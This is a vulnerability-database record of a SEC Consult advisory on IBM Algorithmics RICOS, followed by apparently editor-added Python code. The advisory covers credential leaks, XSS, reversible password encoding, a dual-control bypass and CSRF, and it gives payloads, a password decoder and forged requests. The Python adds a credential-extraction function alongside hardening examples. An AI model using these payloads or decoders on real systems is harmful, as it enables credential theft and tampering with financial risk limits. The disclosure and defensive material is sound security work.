</t>\n...SNIP...\n\n\nVulnerable / tested versions:\n- -----------------------------\nIBM Algorithmics RICOS 4.71\n\n\nVendor contact timeline:\n- ------------------------\n2014-01-24: Contacting vendor through psirt@vnet.ibm.com\n2014-01-24: Vendor response, will likely require more than 30 days to resolve issues\n asking for acknowledgements\n2014-01-24: Sending acknowledgements\n2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues\n2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS\n2014-02-10: Providing further information on assumed to be false positive issue 1441\n2014-02-14: Telco to clarify vulnerability details and agree on further procedure\n patches are scheduled for end of June 2014\n2014-02-20: Vendor confirms issue 1441 to be a vulnerability\n2014-05-27: Vendor announces that patches will be released on 2014-06-30\n2014-06-26: Vendor published patches and security bulletin\n https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\n2014-06-30: SEC Consult publishes the advisory\n\n\nSolution:\n- ---------\nApply patch ACLM 4.7.0.03 FP5. More information:\nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\n\n\nWorkaround:\n- -----------\nLimit access to RICOS and manually perform sample checks regarding the\nplausibility of limits.\n\n\nAdvisory URL:\n- -------------\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nSEC Consult Vulnerability Lab\n\nSEC Consult\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\n\nHeadquarter:\nMooslackengasse 17, 1190 Vienna, Austria\nPhone: +43 1 8903043 0\nFax: +43 1 8903043 15\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nInterested to work with the experts of SEC Consult?\nWrite to career@sec-consult.com\n\nEOF F. 
Lukavsky / @2014", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:13", "description": "", "cvss3": {}, "published": "2014-06-30T00:00:00", "type": "packetstorm", "title": "IBM Algorithmics RICOS Disclosure / XSS / CSRF", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0867", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0868", "CVE-2014-0894", "CVE-2014-0869", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0864"], "modified": "2014-06-30T00:00:00", "id": "PACKETSTORM:127304", "href": "https://packetstormsecurity.com/files/127304/IBM-Algorithmics-RICOS-Disclosure-XSS-CSRF.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nSEC Consult Vulnerability Lab Security Advisory < 20140630-0 > \n======================================================================= \ntitle: Multiple severe vulnerabilities \nproduct: IBM Algorithmics RICOS \nvulnerable version: 4.5.0 - 4.7.0 \nfixed version: 4.7.0.03 \nCVE number: CVE-2014-0894 \nCVE-2014-0871 \nCVE-2014-0870 \nCVE-2014-0869 \nCVE-2014-0868 \nCVE-2014-0867 \nCVE-2014-0866 \nCVE-2014-0865 \nCVE-2014-0864 \nimpact: critical \nhomepage: http://www-01.ibm.com/software/analytics/algorithmics/ \nfound: 2013-12-19 \nby: A. Kolmann, V. Habsburg-Lothringen, F. 
Lukavsky \nSEC Consult Vulnerability Lab \nhttps://www.sec-consult.com \n======================================================================= \n \nVendor description: \n- ------------------- \nIBM Algorithmics software enables financial institutions and corporate \ntreasuries to make risk-aware business decisions. Supported by a global \nteam of risk experts based in all major financial centers, IBM \nAlgorithmics solution offerings include market, credit and liquidity risk, \nas well as collateral and capital management. \n \nSource: http://www-01.ibm.com/software/analytics/algorithmics/ \n \nRICOS is a pre-deal limit management solution part of the Algo Suite. \n \n \nBusiness recommendation: \n- ------------------------ \nThe identified vulnerabilities affect integrity and confidentiality of the \nrisk management system. SEC Consult does not recommend to rely on RICOS as \npart of risk management until a thorough security review has been performed \nby security professionals. As a workaround, access should be limited only to \ntrusted users internally and sample checks regarding the plausibility of limits \nshould be performed manually. \n \n \nVulnerability overview/description: \n- ----------------------------------- \n1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3) \nThe Tomcat configuration discloses technical details within error messages to \nthe user, which allows an attacker to collect valuable data about the \nenvironment of the solution. \n \n2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5) \nThe password and the username of the backend database are disclosed in \nclear-text to the user of the web application. This allows attackers to \ndirectly connect to the backend database and manipulate arbitrary data stored \nin the database (e.g. limits). 
\n \n3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3) \nSeveral parameters in the RICOS web front end and the Blotter are not properly \nsanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal \nuser sessions and impersonate other users while performing arbitrary actions \non behalf of the victim user. \n \n4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3) \nThe weak algorithm used to store and transfer users' passwords allows an \nattacker to recover the plain-text passwords without knowledge of any \ncryptographic key: the value needed to reverse it is carried in the first two \ncharacters of the encoded string itself. \n \n5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 / \nCVSS 3.5) \nSeveral fields of stored data within RICOS are marked as read-only in the web \napplication, disallowing modification of certain fields. These checks are only \nperformed client-side, allowing an attacker to alter arbitrary data. An \nattacker can create a limit, alter the username of the created limit and \nconfirm the limit himself, circumventing the dual control mechanism advertised by \nRICOS. \n \n6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3) \nA vulnerable page in RICOS allows an attacker to set and overwrite arbitrary \ncookies for a user who clicks on a manipulated link. \n \n7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3) \nThe RICOS fat client submits user credentials in plain-text. An attacker with \naccess to the network communication can perform man-in-the-middle attacks and \nsteal user credentials. \nThis vulnerability also applies to the Blotter, where authentication is \nperformed unencrypted. \n \n8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5) \nThe RICOS fat client performs input validation only client-side. This allows \nan attacker to alter arbitrary data. 
An attacker can create a limit, alter \nthe username of the created limit and confirm the limit himself, circumventing \ndual control mechanisms advertised by RICOS. \n \n9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3) \nThe web application does not verify that requests are made only from within \nthe web application, allowing an attacker to trick users into performing \nrequests to the web application. This allows an attacker to perform tasks on \nbehalf of the victim user like modifying limits. \n \n \nProof of concept: \n- ----------------- \n1) Information Disclosure \nThe following URL causes a status 404, disclosing the Tomcat version: \nhttps://ricos/ricos470/classes/ \n \nIf control characters (i.e. \\x00) are sent as part of the cookie, a stack trace \nis triggered \n \n2) Password Disclosure \nThe following request sent by the client during regular communication shows the \ndatabase connection settings including the username and the password in \nclear-text. \n \nPOST /ricos470/Executer HTTP/1.1 \nHost: ricos \n \n...SNIP... \n<i n=\"URN\" v=\"\"/><i n=\"SecServiceURN\" v=\"obsv2:ricos:20100\"/><i n=\"SecSource\" v=\"LM web\"/><i \nn=\"SecTimeout\" v=\"7200\"/><i n=\"AcsAutoReconnect\" v=\"Y\"/><i n=\"AcsFunctionLimits\" v=\"\"/></t><t \nn=\"ObServer\"><i n=\"UserId\" v=\"\"/><i n=\"Password\" v=\"\"/><i n=\"Host\" v=\"ricos\"/><i n=\"Port\" \nv=\"20100\"/><i n=\"CollectionId\" v=\"\"/><i n=\"DbName\" v=\"RICA\"/><i n=\"Location\" v=\"RICA\"/><i \nn=\"DbType\" v=\"ORA\"/><i n=\"Application\" v=\"RICOS\"/><i n=\"AppId\" v=\"LM web\"/><i n=\"AppDesc\" v=\"\"/><i \nn=\"AppVer\" v=\"4.7.0\"/><i n=\"Component\" v=\"RICOS Gui\"/><i n=\"DbUser\" v=\"rica\"/><i n=\"DbPass\" \nv=\"password\"/> \n...SNIP... 
\n \n3) Non-permanent Cross-Site Scripting \nThe following URLs demonstrate Cross-Site Scripting vulnerabilities: \n \nPOST /ricos470/rcore6/main/showerror.jsp HTTP/1.1 \nHost: ricos \n \nMessage=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang.... \n \nhttps://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x\";+alert(document.cookie);//x \n \nhttps://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')\");alert(document.cookie);// \n \nhttp://ricos/algopds/rcore6/main/browse.jsp?Init=N\";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y \n \n \nhttp://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse\"/><script>alert(document.cookie)</script> \n \n4) Broken Encryption \nThe user's password is transported frequently in requests within the application. 
\nThe following function decrypts the password without requiring any cryptographic key: \n \npublic static void decrypt(String string) \n{ \nint nRadix = 32; \nint nR2 = nRadix * nRadix / 2; \nGregorianCalendar cal = new GregorianCalendar(); \nString key = string.substring(0, 2); \nint nKey = Integer.parseInt(key, 32); \n \nString encPw = string.substring(2, string.length()); \nint y = 0; \nfor (int i = 0; i < encPw.length(); i+=2) \n{ \nString aktuell = encPw.substring(i,i+2); \nint new_value = Integer.parseInt(aktuell, 32); \nint character = - nKey * (y + 1) % nR2 + new_value; \nchar decrypt = (char) character; \nSystem.out.print(decrypt); \ny = y + 1; \n} \n} \n \n5) Manipulation of read-only data / dual control mechanism bypass \nThe following example illustrates how to manipulate a request so that the server \nsaves it on behalf of another user (only the relevant parts are shown): \n \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<ds> \n<t n=\"Service\"> \n<i n=\"RequestType\" v=\"#Action\"/> \n<t n=\"#ActionData\"> \n<i n=\"#ActionName\" v=\"web.getmeta_udf\"/> \n<i n=\"#Mode\" v=\"#Sync\"/> \n<i n=\"#Request\" v=\"#Execute\"/> \n<t n=\"#OutputData\"> \n<t n=\"#MapTable\"> \n<i n=\"#ResultData\" v=\"#ResultData\"/> \n<i n=\"#ResultTable\" v=\"#ResultTable\"/> \n</t> \n</t> \n<t n=\"#InputData\"> \n<t n=\"#WorkTable\"> \n<t n=\"det_limit\"> \n<i n=\"SCTYGEID\" v=\"A\"/> \n[...] \n<i n=\"LMLCURID\" v=\"other_user\"/> \n<i n=\"LMEQEPSTDA\" v=\"\"/> \n[...] \n<i n=\"MFURID\" v=\"other_user\"/> \n<i n=\"LMEVFL\" v=\"N\"/> \n<i n=\"SOLMFL\" v=\"N\"/> \n[...] \n<i n=\"CRURID\" v=\"other_user\"/> \n<i n=\"MFTS\" v=\"\"/> \n<i n=\"MFURID\" v=\"other_user\"/> \n[...] \n<i n=\"CRURID\" v=\"other_user\"/> \n<i n=\"MFTS\" v=\"\"/> \n[...] \n</t> \n<t n=\"Session\"> \n<t n=\"SessionData\"> \n<i n=\"LoginUser\" v=\"other_user\"/> \n<i n=\"LoginPass\" v=\"8HC34BCM5JE84ND95RED\"/> \n[...] 
\n<i n=\"LoginUser\" v=\"other_user\"/> \n<i n=\"LoginPWD\" v=\"326K9DC9FNIT3T70A3D6\"/> \n<i n=\"URN\" v=\"\"/> \n<i n=\"SecServiceURN\" v=\"obsv2:ricos:20100\"/> \n[...] \n</t> \n<t n=\"ObServer\"> \n<i n=\"UserId\" v=\"other_user\"/> \n<i n=\"Password\" v=\"\"/> \n<i n=\"Host\" v=\"ricos\"/> \n[...] \n<i n=\"Prefix\" v=\"RICA\"/> \n<i n=\"DbSystem\" v=\"oracle\"/> \n<i n=\"LoginUserId\" v=\"other_user\"/> \n</t> \n</t> \n</t> \n</ds> \n \n6) Cross-Site Cookie Setting \nThe following URL allows setting of arbitrary cookies: \n \nhttps://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content \n \n7) Plain-text submission of passwords \nNeither the fat client nor the Blotter uses HTTPS to communicate with the \nbackend server. Both send unencrypted credentials via HTTP during authentication. \n \n8) Client-side Input Validation \nBy manipulating serialized objects that are transmitted by the fat client, \nit is possible to change the name of the user who created a limit, allowing an attacker \nto bypass dual control mechanisms. \n \n9) Cross-Site Request Forgery \nThe following request, sent on behalf of an authenticated user, will e.g. 
\nchange the currency of a given deal: \n \nPOST http://ricos/ricos470/Executer HTTP/1.1 \nHost: ricos \n \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<ds> \n<t n=\"Service\"> \n<i n=\"RequestType\" v=\"#Action\"/> \n<t n=\"#ActionData\"> \n<i n=\"#ActionName\" v=\"web.updrec_msp\"/> \n<i n=\"#Mode\" v=\"#Sync\"/> \n<i n=\"#Request\" v=\"#Execute\"/> \n<t n=\"#InputData\"> \n<t n=\"#MapTable\"> \n<i n=\"#InputData\" v=\"det_msp\"/> \n</t> \n<t n=\"#WorkTable\"> \n<t n=\"det_msp\"> \n<i n=\"SYPMID\" v=\"SYS-PAR-ID\"/> \n<i n=\"CUCD\" v=\"USD\"/> \n<i n=\"MIGORILV\" v=\"11\"/> \n<i n=\"ILPLMVFL\" v=\"Y\"/> \n<i n=\"ILNEMVFL\" v=\"Y\"/> \n<i n=\"BSCUONFL\" v=\"N\"/> \n<i n=\"PBSCUOFL\" v=\"N\"/> \n<i n=\"LORICUTEFL\" v=\"N\"/> \n<i n=\"SYSAVAILFL\" v=\"F\"/> \n<i n=\"CUSTID\" v=\"CUSTOMER\"/> \n<i n=\"CBNALI\" v=\"IS-LOCATED-IN\"/> \n<i n=\"CBNAAG\" v=\"AUTOMATIC-GROUP\"/> \n<i n=\"UDF1\" v=\"Welcome to ricos 4.71\"/> \n</t> \n...SNIP... \n \n \nVulnerable / tested versions: \n- ----------------------------- \nIBM Algorithmics RICOS 4.71 \n \n \nVendor contact timeline: \n- ------------------------ \n2014-01-24: Contacting vendor through psirt@vnet.ibm.com \n2014-01-24: Vendor response, will likely require more than 30 days to resolve issues \nasking for acknowledgements \n2014-01-24: Sending acknowledgements \n2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues \n2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS \n2014-02-10: Providing further information on assumed to be false positive issue 1441 \n2014-02-14: Telco to clarify vulnerability details and agree on further procedure \npatches are scheduled for end of June 2014 \n2014-02-20: Vendor confirms issue 1441 to be a vulnerability \n2014-05-27: Vendor announces that patches will be released on 2014-06-30 \n2014-06-26: Vendor published patches and security bulletin \nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881 \n2014-06-30: SEC Consult 
publishes the advisory \n \n \nSolution: \n- --------- \nApply patch ACLM 4.7.0.03 FP5. More information: \nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881 \n \n \nWorkaround: \n- ----------- \nLimit access to RICOS and manually perform sample checks regarding the \nplausibility of limits. \n \n \nAdvisory URL: \n- ------------- \nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nSEC Consult Vulnerability Lab \n \nSEC Consult \nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius \n \nHeadquarter: \nMooslackengasse 17, 1190 Vienna, Austria \nPhone: +43 1 8903043 0 \nFax: +43 1 8903043 15 \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nInterested to work with the experts of SEC Consult? \nWrite to career@sec-consult.com \n \nEOF F. Lukavsky / @2014 \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (MingW32) \nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/ \n \niQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+ \nuaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg \nuFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F \nuQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e \n0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl \nEEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8= \n=OFL7 \n-----END PGP SIGNATURE----- \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/127304/SA-20140630-0.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
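Item 4 of the advisory above quotes the fat client's password "decryption" routine in Java, and items 2 and 7 note that the same unencrypted Executer requests carry the backend database account in clear text. The following Python block is an added example by the editor, not code from the SEC Consult advisory or from the IBM product: it ports the decoder, derives its inverse so the two can be round-trip checked, and pulls both secrets out of a constructed request fragment whose field values are the ones printed in the advisory (the `<i n="..." v="..."/>` regular expression, the function names and the sample fragment are the editor's assumptions). Run against the two LoginPass/LoginPWD values in the item 5 request, both decode to ricos1234. Note the caveat on Java's sign-preserving `%`: a literal translation of the Java expression into Python decodes wrongly.

```python
import re
from typing import Dict

RADIX = 32
N_R2 = RADIX * RADIX // 2            # nR2 = 512 in the advisory's decrypt()
DIGITS = "0123456789abcdefghijklmnopqrstuv"


def b32_pair(pair: str) -> int:
    """Value of two base-32 digits as Java's Integer.parseInt(pair, 32) sees them."""
    hi, lo = (int(c, 36) for c in pair)      # int(c, 36) maps 0-9a-zA-Z like Java does
    if hi >= RADIX or lo >= RADIX:
        raise ValueError(f"not base-32 digits: {pair!r}")
    return hi * RADIX + lo


def ricos_decode(token: str) -> str:
    """Port of the advisory's decrypt(): the first two digits are the 'key', every
    following digit pair is one password character shifted by key*(pos+1) mod 512."""
    if len(token) < 2 or len(token) % 2:
        raise ValueError("token must be an even number of base-32 digits, at least two")
    key = b32_pair(token[:2])
    chars = []
    for y, i in enumerate(range(2, len(token), 2)):
        value = b32_pair(token[i:i + 2])
        # Java evaluates  -nKey * (y+1) % nR2 + value  with a sign-preserving %, which
        # equals  value - ((key*(y+1)) % 512).  Python's % would wrap the negative
        # remainder positive, so the Java expression must not be copied verbatim.
        chars.append(chr(value - ((key * (y + 1)) % N_R2)))
    return "".join(chars)


def ricos_encode(password: str, key: int) -> str:
    """Inverse of ricos_decode, derived here for round-trip checks; the advisory
    shows only the decoder, not the product's encoder (assumption: same layout)."""
    if not 0 <= key < RADIX * RADIX:
        raise ValueError("key must fit in two base-32 digits")

    def pair(n: int) -> str:
        return DIGITS[n // RADIX] + DIGITS[n % RADIX]

    out = [pair(key)]
    for y, ch in enumerate(password):
        v = ord(ch) + (key * (y + 1)) % N_R2
        if v >= RADIX * RADIX:
            raise ValueError(f"character {ch!r} does not fit in two digits")
        out.append(pair(v))
    return "".join(out).upper()


# Assumed shape of the <i n="..." v="..."/> items seen in the advisory's requests.
FIELD_RE = re.compile(r'<i n="([^"]*)" v="([^"]*)"/>')


def triage_request(body: str) -> Dict[str, str]:
    """What an on-path observer learns from one unencrypted Executer request:
    the cleartext DB account (item 2) and the decodable user password (item 4)."""
    fields = dict(FIELD_RE.findall(body))
    found: Dict[str, str] = {}
    if fields.get("DbUser") is not None and fields.get("DbPass") is not None:
        found["db"] = f"{fields['DbUser']}:{fields['DbPass']}"
    for name in ("LoginPass", "LoginPWD"):
        if fields.get(name):
            found[name] = ricos_decode(fields[name])
    return found


# Constructed request fragment; the field values are the ones printed in the advisory.
SAMPLE_REQUEST = (
    '<t n="Session"><t n="SessionData">'
    '<i n="LoginUser" v="other_user"/><i n="LoginPass" v="8HC34BCM5JE84ND95RED"/>'
    '</t><t n="ObServer">'
    '<i n="DbUser" v="rica"/><i n="DbPass" v="password"/>'
    '</t></t>'
)

if __name__ == "__main__":
    print(triage_request(SAMPLE_REQUEST))
```

Because the "key" travels inside the token, anyone holding the token holds the password; treating the scheme as encryption, rather than as reversible obfuscation, is the design error. Transport protection (TLS) and a real password hash at rest are the fix, not a larger radix.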
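Items 5 and 8 describe the same defect from the web and fat-client side: ownership fields such as CRURID and MFURID are read-only in the GUI only, so the server stores whatever the request body says and one user can create a limit as somebody else and then confirm it. The Python sketch below is an added example by the editor, not RICOS code: it contrasts a store that trusts the client-supplied ownership fields with one that derives them from the authenticated session and enforces the four-eyes rule on the server. The field names LIMITID and AMOUNT, the class and function names and the user names are assumptions.

```python
from dataclasses import dataclass
from typing import Dict, Mapping, Optional, Tuple


class DualControlViolation(Exception):
    """Raised when the confirming user is not independent of the creator/last editor."""


@dataclass
class Limit:
    limit_id: str
    amount: float
    created_by: str                  # CRURID in the advisory's det_limit record
    modified_by: str                 # MFURID
    confirmed_by: Optional[str] = None


class LimitStore:
    def __init__(self) -> None:
        self._limits: Dict[str, Limit] = {}

    def save_limit_trusting_client(self, session_user: str, body: Mapping[str, str]) -> Limit:
        """The pattern the advisory describes: the GUI marks CRURID/MFURID read-only,
        but the server persists whatever the body carries. session_user is ignored."""
        lim = Limit(body["LIMITID"], float(body["AMOUNT"]), body["CRURID"], body["MFURID"])
        self._limits[lim.limit_id] = lim
        return lim

    def save_limit(self, session_user: str, body: Mapping[str, str]) -> Limit:
        """Hardened: ownership comes from the authenticated session, any CRURID/MFURID
        in the body is discarded, and editing clears an earlier confirmation."""
        lim = self._limits.get(body["LIMITID"])
        if lim is None:
            lim = Limit(body["LIMITID"], float(body["AMOUNT"]), session_user, session_user)
        else:
            lim.amount = float(body["AMOUNT"])
            lim.modified_by = session_user
            lim.confirmed_by = None
        self._limits[lim.limit_id] = lim
        return lim

    def confirm_limit(self, session_user: str, limit_id: str) -> Limit:
        """Four-eyes rule checked only here, on the server: the confirmer must differ
        from both the creator and the last editor."""
        lim = self._limits[limit_id]
        if session_user in (lim.created_by, lim.modified_by):
            raise DualControlViolation(
                f"{session_user} cannot confirm limit {limit_id} they created or edited")
        lim.confirmed_by = session_user
        return lim


# Constructed body in the spirit of the advisory's det_limit record: the attacker
# ("mallory") claims that "other_user" created and last edited the limit.
FORGED_BODY = {"LIMITID": "L-1", "AMOUNT": "5000000",
               "CRURID": "other_user", "MFURID": "other_user"}


def demo_bypass() -> Optional[str]:
    """Client-trusted ownership: mallory files the limit 'as' other_user and then
    confirms it herself. Returns who ended up as the confirmer."""
    store = LimitStore()
    store.save_limit_trusting_client("mallory", FORGED_BODY)
    return store.confirm_limit("mallory", "L-1").confirmed_by


def demo_hardened() -> Tuple[str, bool, Optional[str]]:
    """Server-derived ownership: the same body records mallory as creator, her own
    confirmation is refused, and a second user has to sign off.
    Returns (creator, mallory_was_blocked, confirmer)."""
    store = LimitStore()
    lim = store.save_limit("mallory", FORGED_BODY)
    try:
        store.confirm_limit("mallory", "L-1")
        blocked = False
    except DualControlViolation:
        blocked = True
    confirmed = store.confirm_limit("alice", "L-1")
    return lim.created_by, blocked, confirmed.confirmed_by


if __name__ == "__main__":
    print("bypass confirmed by:", demo_bypass())
    print("hardened:", demo_hardened())
```

The read-only attribute in the form, and the fat client's own validation, are presentation hints; the only trust boundary is the server, so every field that encodes identity or approval state must be either computed there or rejected when supplied by the client.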
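Item 9 shows that the Executer endpoint acts on any state-changing XML POST that arrives with the victim's session cookie. The check below is an added example by the editor, not the product's code: it rejects a request unless the browser-supplied Origin (or, failing that, Referer) names the application's own origin and the request carries a per-session token that only same-origin script can read and attach. The allowed origin https://ricos, the X-CSRF-Token header name and the Session class are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Mapping, Optional
from urllib.parse import urlsplit

# Assumption: the application is served from this single origin.
ALLOWED_ORIGINS = {"https://ricos"}


@dataclass
class Session:
    user: str
    csrf_token: str


def new_session(user: str) -> Session:
    """One unguessable token per login; it is handed to same-origin pages only."""
    return Session(user, secrets.token_urlsafe(32))


def _origin_of(url: str) -> Optional[str]:
    """Reduce a Referer URL to scheme://host[:port]; None if it is not a full URL."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}"


def csrf_check(headers: Mapping[str, str], session: Session) -> Optional[str]:
    """Return None if the request may proceed, otherwise the reason it is refused.
    Two independent checks: where the browser says the request came from, and
    proof that the sender could read the session's token (a cross-site page
    cannot, even though the browser attaches the cookie for it)."""
    h = {k.lower(): v for k, v in headers.items()}
    origin = h.get("origin")
    if origin is None and "referer" in h:
        origin = _origin_of(h["referer"])
    if origin is None:
        # Fail closed: a client that strips both headers cannot prove its origin.
        return "no Origin/Referer: cannot prove the request came from the application"
    if origin not in ALLOWED_ORIGINS:          # also rejects the literal "null" origin
        return f"cross-site request from {origin}"
    token = h.get("x-csrf-token", "")
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return "missing or wrong CSRF token"
    return None


if __name__ == "__main__":
    s = new_session("alice")
    legit = {"Origin": "https://ricos", "X-CSRF-Token": s.csrf_token}
    forged = {"Origin": "https://attacker.example"}      # cookie present, token not readable
    print("legit :", csrf_check(legit, s))
    print("forged:", csrf_check(forged, s))
```

A custom request header is a good carrier for the token on an endpoint that takes raw XML rather than form fields: it cannot be set by a plain HTML form, so a cross-origin sender would need a CORS preflight the server never grants. The fail-closed branch for missing Origin and Referer is deliberate; it may block unusual clients, which is the documented trade-off for a limit-management endpoint.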